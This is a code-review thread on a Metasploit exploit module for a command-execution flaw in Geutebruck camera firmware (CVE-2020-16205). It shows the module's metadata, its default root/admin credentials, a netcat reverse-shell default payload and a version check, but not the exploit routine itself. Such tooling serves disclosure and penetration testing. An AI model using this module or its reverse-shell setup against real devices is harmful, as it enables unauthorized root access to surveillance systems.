modules/exploits/linux/http/geutebruck_testaction_exec.rb

```diff
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
+      'Description'    => %q{
+        This module exploits a an arbitrary command execution vulnerability. The
+        vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
+        authenticated user to execute arbitrary commands with root privileges.
+        with web user privileges. Firmware <= 1.12.14.5 are concerned.
+        Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
+      },
+      'Author'         =>
+        [
+          'Davy Douhine'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2020-16205' ],
+          [ 'URL', 'http://geutebruck.com' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
+        ],
+      'DisclosureDate' => 'May 20 2020',
+      'Privileged'     => true,
+      'Platform'            => ['unix', 'linux'],
+      'Arch'                => [ARCH_ARMLE],
+      'Targets'              => [
+        [ 'Automatic Target', { } ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions'      =>
+       {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+        }
+      ))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
+        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
+        OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
+      ], self.class)
+  end
+
+  def check
+      begin
+        res = send_request_cgi(
+          'method' => 'GET',
+          'uri' => '/brand.xml',
+          'query' => "",
+        )
+        if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5"))
+          return CheckCode::Vulnerable
+        end
+      rescue ::Rex::ConnectionError
+        return CheckCode::Unknown
+      end
+      CheckCode::Safe
+    end
```

Comment:
```suggestion
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/brand.xml',
      'query' => "",
    })

    unless res
      return CheckCode::Safe('Connection failed')
    end

    if (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5"))
      return CheckCode::Vulnerable
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    return CheckCode::Unknown
  end
```

Is `'query' => "",` necessary?

Also it would be nice to print the identified version. Are these versions `("1.12.0.25") || ("1.12.13.2") || ("1.12.14.5")` the only vulnerable versions? Or is there a known-vulnerable range? If so, you can do version comparison with `Gem::Version`.

Reply:
Good point, `'query' => "",` not useful.
The vendors says that 1.12.0.25 and prior are vulnerable and also 1.12.13.2 and 1.12.14.5.
Ok, I'll try to find some `Gem::Version` examples to implement a better check.

Reply:
https://github.com/rapid7/metasploit-framework/blob/f5e50eb4b02f2163ad08373b432c84cc97ed3c1e/modules/exploits/windows/local/cve_2020_0787_bits_arbitrary_file_move.rb#L112 was one I did a little while back that should show you how to compare multiple versions using `Gem::Version`, although the code starting at https://github.com/rapid7/metasploit-framework/blob/e9a8d5708ac9f265fc2a6c688bf4f94973c34522/modules/exploits/unix/http/quest_kace_systems_management_rce.rb#L86 might be a simpler example.

Reply:
This is now fixed with latest commits. Sorry I forgot to mark this as resolved earlier!